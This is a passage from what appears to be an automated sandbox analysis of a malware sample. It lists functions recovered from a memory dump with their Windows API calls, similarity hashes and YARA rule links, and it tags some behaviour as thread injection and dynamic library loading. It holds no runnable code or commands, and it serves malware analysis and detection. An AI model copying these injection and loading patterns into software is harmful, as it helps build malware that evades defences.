Part of subcall function 0463990C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04621060), ref: 046399F0
Part of subcall function 0463990C: CloseHandle.KERNEL32(?), ref: 04639A23
Part of subcall function 0463990C: CloseHandle.KERNEL32(?), ref: 04639A28

_snprintf.NTDLL ref: 04621086

Part of subcall function 0463990C: GetLastError.KERNEL32 ref: 046399F4
Part of subcall function 0463990C: GetExitCodeProcess.KERNEL32(?,00000001), ref: 04639A14

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 046210A5

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID:
API String ID: 1481739438-0
Opcode ID: 4bf37d006c88ceecea853d4204d026271545da57d6c626d47ae671e9e33c05b3
Instruction ID: 36741da396c6f67b6851822fdd058d5502de692a3a5e88d4a5a61333a18ebd9a
Opcode Fuzzy Hash: 4bf37d006c88ceecea853d4204d026271545da57d6c626d47ae671e9e33c05b3
Instruction Fuzzy Hash: 7611BEBA500229BFCF11AF64CC45EDB3F6CEB85764F158011FA0997351EA74EA108FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463CC22, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(046392F6,00000000,00000000,00000008,00000000,?,046392F6,046243F3,00000000,?), ref: 0463CC38
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0463CC4B
lstrcpy.KERNEL32(00000008,046392F6), ref: 0463CC6D
GetLastError.KERNEL32(046311F3,00000000,00000000,?,046392F6,046243F3,00000000,?), ref: 0463CC96
HeapFree.KERNEL32(00000000,00000000,?,046392F6,046243F3,00000000,?), ref: 0463CCAE
CloseHandle.KERNEL32(00000000,046311F3,00000000,00000000,?,046392F6,046243F3,00000000,?), ref: 0463CCB7

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 9aa66ee7a376b2561a66151d64561a903a0b7cd00ae80b7dd8045643ce39c6c6
Instruction ID: fc942b9668103826a49967bc57a18c48656f6bcbbeda8a7d00c4c3c1b7c2d562
Opcode Fuzzy Hash: 9aa66ee7a376b2561a66151d64561a903a0b7cd00ae80b7dd8045643ce39c6c6
Instruction Fuzzy Hash: E311C4BB500249EFDF10AFA4DC8999E7BB8FB91762700442AF516E3200FB34AC51DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0463EFDC, Relevance: 9.1, APIs: 6, Instructions: 64stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0463F004
_strupr.NTDLL ref: 0463F03B
lstrlen.KERNEL32(00000000), ref: 0463F043
TerminateProcess.KERNEL32(00000000,00000000), ref: 0463F07D
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0463F084
GetLastError.KERNEL32 ref: 0463F08C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: f8679aa0eb276f56f7e33d2ee3893ebc258641ea74517bf489e6b3b5ad44dbed
Instruction ID: 4c3a3dd32b48d467d4079e930dbd77340ba371657c5ac07d14f2b5903db999de
Opcode Fuzzy Hash: f8679aa0eb276f56f7e33d2ee3893ebc258641ea74517bf489e6b3b5ad44dbed
Instruction Fuzzy Hash: 7711C1BA500244EBDF216B74EC89EAF376CEBD8716F005425FA0693141FF78AC948A20

Uniqueness

Uniqueness Score: -1.00%

Function 04624FA0, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

LoadLibraryA.KERNEL32(6676736D,00000000,?,00000014,?,0463211D), ref: 04624FC0
GetProcAddress.KERNEL32(00000000,704F4349), ref: 04624FDF
GetProcAddress.KERNEL32(00000000,6C434349), ref: 04624FF4
GetProcAddress.KERNEL32(00000000,6E494349), ref: 0462500A
GetProcAddress.KERNEL32(00000000,65474349), ref: 04625020
GetProcAddress.KERNEL32(00000000,65534349), ref: 04625036

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: ea0bc77dbf8d82ade6da39fdcc9f57cd76cf89fd4244df3e5870540a49d80feb
Instruction ID: e54e35350dcedcfdf26ad5df544215f1f2f1fe85bc13e1c1c3b9b1a0117d5023
Opcode Fuzzy Hash: ea0bc77dbf8d82ade6da39fdcc9f57cd76cf89fd4244df3e5870540a49d80feb
Instruction Fuzzy Hash: 871100756016177FDB21EFA9DC84DA6B3ECEFA62443059427E506C7311FA78E8058F60

Uniqueness

Uniqueness Score: -1.00%

Function 0462D84A, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
GetCurrentThreadId.KERNEL32 ref: 0462D882
GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
lstrcpy.KERNEL32(00000000), ref: 0462D8BE

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 697658e7cb99bd15ec178927c0e8a08e15073077456be74b6ce10d26adfa2ff9
Instruction ID: 4e1a9408ac9b09325b4a3aefbbf2feafcec05e1bae98eaa31938dd14893b0028
Opcode Fuzzy Hash: 697658e7cb99bd15ec178927c0e8a08e15073077456be74b6ce10d26adfa2ff9
Instruction Fuzzy Hash: 1501C477900524BBDB215BA69D49EAB3BBCEFD2B407050125B900D3200FF38EC048BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0463D885, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00000000,046392F6,00000000,0463CC92), ref: 0463D89C
QueueUserAPC.KERNEL32(046392F6,00000000,046243F3,?,046392F6,046243F3,00000000,?), ref: 0463D8B1
GetLastError.KERNEL32(00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8BC
TerminateThread.KERNEL32(00000000,00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8C6
CloseHandle.KERNEL32(00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8CD
SetLastError.KERNEL32(00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8D6

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 411c7a34e75d81ff0f7d1b70f48f0821ae78e4c6ba619cc2672e4e4664ed5bac
Instruction ID: 68d2b987cc50d2d3a5a2c127db32f5f228b57477482fe325a52efd6a8242a03c
Opcode Fuzzy Hash: 411c7a34e75d81ff0f7d1b70f48f0821ae78e4c6ba619cc2672e4e4664ed5bac
Instruction Fuzzy Hash: 81F0823E204760ABCB215FA0AC0AF6BBB68FF99B52F012414F60592141EB389C20CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04621CAE, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04621D09
SetLastError.KERNEL32(00000000,?,?,?), ref: 04621D5D

Strings

vids, xrefs: 04621D68

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 5625a2688b55a3d83ad34e580ba10f7a2fefc6aa9b08228861a203666841d872
Instruction ID: b4e8f01f7293d1b303d45494c11906ddc55f7c28244d8f35fd2901c2f483fc07
Opcode Fuzzy Hash: 5625a2688b55a3d83ad34e580ba10f7a2fefc6aa9b08228861a203666841d872
Instruction Fuzzy Hash: D28116B1D00629EFDF10DFA4C9809EDBBB9FF49704F10855AE819A7250E770AA41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0463578D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 04635817
lstrlen.KERNEL32(?), ref: 04635848
memcpy.NTDLL(00000008,?,00000001), ref: 04635857
HeapFree.KERNEL32(00000000,00000000), ref: 046358D9

Strings

W, xrefs: 04635798

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlenmemcpy
String ID: W
API String ID: 379260646-655174618
Opcode ID: ab054ec4ecdca7cca696818e8aad642b06bb30a5919c5688222501afde11d863
Instruction ID: dff2220604f89eec6c3455c6f70ae4a3496939b6315f6a23c1392f60af2c2a65
Opcode Fuzzy Hash: ab054ec4ecdca7cca696818e8aad642b06bb30a5919c5688222501afde11d863
Instruction Fuzzy Hash: DB41AF34500795FBDB348F28D8847D57BB5EB6570AF04A82EE48A87350F374B486CB99

Uniqueness

Uniqueness Score: -1.00%

Function 04632226, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,0462A358,00000000,?,?,?,0462A358,?,?,?,?,?), ref: 04632264
lstrlen.KERNEL32(0462A358,?,?,?,0462A358,?,?,?,?,?), ref: 04632282
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 046322F1
lstrlen.KERNEL32(0462A358,00000000,00000000,?,?,?,0462A358,?,?,?,?,?), ref: 04632312
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04632326
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0463232F
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0463233D

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: f2811fc1d6ebaf7876e36eb2b2827e96ec04fe9a7426ff73d2d754327a608900
Instruction ID: 20e5c9faeaa5beac93b5e058c61d5aa25f711949b34759920610079363d9ef0c
Opcode Fuzzy Hash: f2811fc1d6ebaf7876e36eb2b2827e96ec04fe9a7426ff73d2d754327a608900
Instruction Fuzzy Hash: A741F3B680025AAFDF10DF69DC458DF3BA8EF553A4B05446AFC04A7210E735EE609BE0

Uniqueness

Uniqueness Score: -1.00%

Function 04630FA4, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

lstrcpy.KERNEL32(?,00000020), ref: 046310A1
lstrcat.KERNEL32(?,00000020), ref: 046310B6
lstrcmp.KERNEL32(00000000,?), ref: 046310CD
lstrlen.KERNEL32(?,?,D448B889,00000000,63699BC3), ref: 046310F1

Strings

, xrefs: 0463103A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 2f1cfc8bae9b505c9e53cc2cd2bc9417cf5b38506d6d8f5f4d232ce1eee3ad29
Instruction ID: 49c5b0748a4a3f2abd59ec8f9f3e068bed59c0e9eeaae8f83287dbdeeb9d0e79
Opcode Fuzzy Hash: 2f1cfc8bae9b505c9e53cc2cd2bc9417cf5b38506d6d8f5f4d232ce1eee3ad29
Instruction Fuzzy Hash: 7551C835A00198EFDF21CF99C845AEDBBB5FF56316F05805AE8159B302EB70BA52CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04639313, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 04622619: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,00000000,?,04639FDB), ref: 0462262A
Part of subcall function 04622619: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,04639FDB), ref: 04622647

lstrlenW.KERNEL32(00000000,00000000,73B006E0,00000020,00750025,80000001), ref: 04639359
lstrlenW.KERNEL32(00000008), ref: 04639360
lstrlenW.KERNEL32(?,?), ref: 0463937C
lstrlen.KERNEL32(?,006F0070,00000000), ref: 046393F6
lstrlenW.KERNEL32(?), ref: 04639402
wsprintfA.USER32 ref: 04639430

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 3aabdb44376afe51bc51c3ad191b36b8747b2649a1ff846a9f72c88dd9bf2654
Instruction ID: 6f512a1ed0203c5d4daf8a027938208aab32637562c3b7b87097d34f978bb3e4
Opcode Fuzzy Hash: 3aabdb44376afe51bc51c3ad191b36b8747b2649a1ff846a9f72c88dd9bf2654
Instruction Fuzzy Hash: 61415EB5900249BFDF01AFA8DD44DEE7BB9EF85308B048466E90497212FB75EA149F60

Uniqueness

Uniqueness Score: -1.00%

Function 04629271, Relevance: 7.6, APIs: 5, Instructions: 133registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,73BCFC30,745EC740,?,00000250,?,00000000), ref: 0462F91A
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?,?,00000000), ref: 0462F926
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F96E
Part of subcall function 0462F8CE: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0462F989
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(0000002C), ref: 0462F9C1
Part of subcall function 0462F8CE: lstrlenW.KERNEL32(?), ref: 0462F9C9
Part of subcall function 0462F8CE: memset.NTDLL ref: 0462F9EC
Part of subcall function 0462F8CE: wcscpy.NTDLL ref: 0462F9FE

WaitForSingleObject.KERNEL32(00000000,00410025,05D39A2C,?,00000000,00000000,00000001), ref: 0462931B
RegOpenKeyA.ADVAPI32(80000001,54464F53,?), ref: 04629355
RegCloseKey.ADVAPI32(?), ref: 04629381
WaitForSingleObject.KERNEL32(00000000,Function_00006CDD,04648274), ref: 046293E5
RtlExitUserThread.NTDLL(?), ref: 0462941B

Part of subcall function 04621557: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04640E6C,00000000,?,?), ref: 04621575
Part of subcall function 04621557: GetFileSize.KERNEL32(00000000,00000000,?,?,04640E6C,00000000,?,?,?,00000000,-00000007,04631DE6,-00000007,?,00000000), ref: 04621585
Part of subcall function 04621557: CloseHandle.KERNEL32(000000FF,?,?,04640E6C,00000000,?,?,?,00000000,-00000007,04631DE6,-00000007,?,00000000), ref: 046215E7

Part of subcall function 046229AD: CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000), ref: 046229ED
Part of subcall function 046229AD: GetLastError.KERNEL32 ref: 046229F7
Part of subcall function 046229AD: WaitForSingleObject.KERNEL32(000000C8), ref: 04622A1C
Part of subcall function 046229AD: CreateFileW.KERNEL32(00000001,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 04622A3F
Part of subcall function 046229AD: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 04622A67
Part of subcall function 046229AD: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 04622A7C
Part of subcall function 046229AD: SetEndOfFile.KERNEL32(?), ref: 04622A89
Part of subcall function 046229AD: CloseHandle.KERNEL32(?), ref: 04622AA1

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
String ID:
API String ID: 796380773-0
Opcode ID: 78bdcfd15380bdeb8bdd3a6a7c33f167eb44a345f717dd701448b3198e469fcb
Instruction ID: 912690818954e962ab144de7ff45c837575bd953c38aef456172ec93ecf7390d
Opcode Fuzzy Hash: 78bdcfd15380bdeb8bdd3a6a7c33f167eb44a345f717dd701448b3198e469fcb
Instruction Fuzzy Hash: B9514DB9A00619BFDF14DFA4C985E9E77B9EB99314F00406AE504E7290F774AE08CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04626AB8, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0462CDCD: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0462CDD9
Part of subcall function 0462CDCD: SetLastError.KERNEL32(000000B7,?,04626ACC), ref: 0462CDEA

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04626AEC
CloseHandle.KERNEL32(00000000), ref: 04626BC4

Part of subcall function 0463DB0E: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0463DB28
Part of subcall function 0463DB0E: CreateWaitableTimerA.KERNEL32(04648168,00000003,?), ref: 0463DB45
Part of subcall function 0463DB0E: GetLastError.KERNEL32(?,?,04626B20,?), ref: 0463DB56
Part of subcall function 0463DB0E: GetSystemTimeAsFileTime.KERNEL32(?,00000000,04626B20,?,?,?,04626B20,?), ref: 0463DB96
Part of subcall function 0463DB0E: SetWaitableTimer.KERNEL32(?,04626B20,00000000,00000000,00000000,00000000,?,?,04626B20,?), ref: 0463DBB5
Part of subcall function 0463DB0E: HeapFree.KERNEL32(00000000,04626B20,00000000,04626B20,?,?,?,04626B20,?), ref: 0463DBCB

GetLastError.KERNEL32(?), ref: 04626BAD
ReleaseMutex.KERNEL32(00000000), ref: 04626BB6

Part of subcall function 0462CDCD: CreateMutexA.KERNEL32(04648168,00000000,?,?,04626ACC), ref: 0462CDFD

GetLastError.KERNEL32 ref: 04626BD1

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 8ee5446f1f82e49bd360c678d6f228c2b9640cbfe10c6facaede2ca0984ac5a5
Instruction ID: d44c158f7bae811c641dee0157c9044b14a527d14e4ef1944e8a1e7c9f937036
Opcode Fuzzy Hash: 8ee5446f1f82e49bd360c678d6f228c2b9640cbfe10c6facaede2ca0984ac5a5
Instruction Fuzzy Hash: 5E317E79A00618AFCB11AF74D9849AA7BB9EBC9715B100829E812DB350FA399D11CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04623E63, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 04623E7C

Part of subcall function 04638DDB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0463434B), ref: 04638E01

HeapFree.KERNEL32(00000000,?,?,?,?,00000001), ref: 04623EBE
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 04623F10
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,?,?,?,00000001), ref: 04623F29

Part of subcall function 046418D9: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 046418FA
Part of subcall function 046418D9: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,04623EAF,?,?,?,00000001), ref: 0464193D

GetLastError.KERNEL32 ref: 04623F61

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: d8d11ac7483544cc85934eb4f231e66ef92ebe80a5834554d810ee870cc7d781
Instruction ID: c4fd7eab95081e6bebcd954d22fd9aac8d2a5c0e22a82433e207d3cecb3c456c
Opcode Fuzzy Hash: d8d11ac7483544cc85934eb4f231e66ef92ebe80a5834554d810ee870cc7d781
Instruction Fuzzy Hash: EB313975A00615BBDF11DFA4EA80AAE7BB5FB44750F000065ED05AB340F738AE84CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0463D774, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0463D7F6
lstrcpy.KERNEL32(00000000,62617267), ref: 0463D80F
lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0463D81C
lstrlen.KERNEL32(046493A8,?,?,?,?,?,00000000,00000000,?), ref: 0463D82E
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000000,?), ref: 0463D85F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: 42a0670ea313f7c478eca664dba72d0e8827bb0d834d2917fb201d8cf26c45f0
Instruction ID: 673395680f9591f10b8743a73f663da282f4355263762680adbefc6365b1fb63
Opcode Fuzzy Hash: 42a0670ea313f7c478eca664dba72d0e8827bb0d834d2917fb201d8cf26c45f0
Instruction Fuzzy Hash: 00315A76900249FFDF11DF95CC89EEE7BB9EB95361F008024F90592200F779A954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04633308, Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 04637FE1: RtlEnterCriticalSection.NTDLL(046483A8), ref: 04637FE9
Part of subcall function 04637FE1: RtlLeaveCriticalSection.NTDLL(046483A8), ref: 04637FFE
Part of subcall function 04637FE1: InterlockedIncrement.KERNEL32(0000001C), ref: 04638017

RtlAllocateHeap.NTDLL(00000000,?,636F6C42), ref: 0463333F
memcpy.NTDLL(00000000,?,?), ref: 04633350
lstrcmpi.KERNEL32(00000002,?), ref: 04633396
memcpy.NTDLL(00000000,?,?), ref: 046333AA
HeapFree.KERNEL32(00000000,00000000,636F6C42), ref: 046333F0

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 733514052-0
Opcode ID: c2ceb4854b858ecce96c54cf2a46e4b97af242a5189cd181f726613429ebefb1
Instruction ID: 39cccb7795d285c6e4b0e36fe5a713c0ba2b09e75c894ecf2f62a84c6ebed55d
Opcode Fuzzy Hash: c2ceb4854b858ecce96c54cf2a46e4b97af242a5189cd181f726613429ebefb1
Instruction Fuzzy Hash: 6931C376900299BFEF10AFA8DC84A9E7BB8FB54355F148029F90597300FB35AD84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04640465, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 04626356: lstrlen.KERNEL32(00000000,00000000,?,00000000,04640479,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000), ref: 04626362

RtlEnterCriticalSection.NTDLL(046483A8), ref: 0464048F
RtlLeaveCriticalSection.NTDLL(046483A8), ref: 046404A2
GetSystemTimeAsFileTime.KERNEL32(?), ref: 046404B3
RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 0464051E
InterlockedIncrement.KERNEL32(046483BC), ref: 04640535

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: fd0a1b0b89d098f20e0102a99ac2d120e5e0d353b4e99734e323b1278f7c3af5
Instruction ID: a7de7e7d397baa2decf3fc20d003fcf792aa663c2c280756a632ae85a835b0ed
Opcode Fuzzy Hash: fd0a1b0b89d098f20e0102a99ac2d120e5e0d353b4e99734e323b1278f7c3af5
Instruction Fuzzy Hash: F431EE3A501721EFDF21EFA8C944A2AB7A4FBD5724B00651DEA5983201F730EC25CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04623D50, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(5250534E,?,00000000,00000000,0463B8B4,00000000,73BCF5B0,046412BB,61636F4C,00000001), ref: 04623D70
LoadLibraryA.KERNEL32(3353534E,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 04623D85
LoadLibraryA.KERNEL32(2E4C5558,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 04623DA1
GetProcAddress.KERNEL32(00000000,475F5250), ref: 04623DB6
GetProcAddress.KERNEL32(00000000,535F5250), ref: 04623DCA

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: LibraryLoad$AddressProc
String ID:
API String ID: 1469910268-0
Opcode ID: bc577c474f9671c74abb6f888e882f85c8abde6474ab11e55f86a5f160c2f10c
Instruction ID: 993015c2ec3ad2d8c253cd5f03a15df28e4426fa489f957f763d3c7b8385dc88
Opcode Fuzzy Hash: bc577c474f9671c74abb6f888e882f85c8abde6474ab11e55f86a5f160c2f10c
Instruction Fuzzy Hash: 5A318D7E650615AFCF04EF68E981A5533E8F7CA724704606AEA08DB300F738EC458F60

Uniqueness

Uniqueness Score: -1.00%

Function 0462486C, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?), ref: 0462D85C
Part of subcall function 0462D84A: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D875
Part of subcall function 0462D84A: GetCurrentThreadId.KERNEL32 ref: 0462D882
Part of subcall function 0462D84A: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E,?,00000008), ref: 0462D88E
Part of subcall function 0462D84A: GetTempFileNameA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,04629F8E,00000929,00000000,?,0463EE63,00000000,00000000,?,0000000E), ref: 0462D89C
Part of subcall function 0462D84A: lstrcpy.KERNEL32(00000000), ref: 0462D8BE

DeleteFileA.KERNEL32(00000000,000004D2), ref: 0462488F
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04624898
GetLastError.KERNEL32 ref: 046248A2
HeapFree.KERNEL32(00000000,00000000), ref: 04624961

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID:
API String ID: 3543646443-0
Opcode ID: 35d18bfd063dcdbd6e8c73cb3f09e5454dce2c5fbd4fce0373141e5add18ddc5
Instruction ID: 02058562b80e26ee327340297a9a97096da0dae354c5934edbb1985f0a443cad
Opcode Fuzzy Hash: 35d18bfd063dcdbd6e8c73cb3f09e5454dce2c5fbd4fce0373141e5add18ddc5
Instruction Fuzzy Hash: 9221AEBFA025607BDF10BBE0EC48EC6379CDFDB604B045012B605C7241FA28E914CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 046336C3, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0462CC6B: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0462CC77
Part of subcall function 0462CC6B: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0462CC8D
Part of subcall function 0462CC6B: _snwprintf.NTDLL ref: 0462CCB2
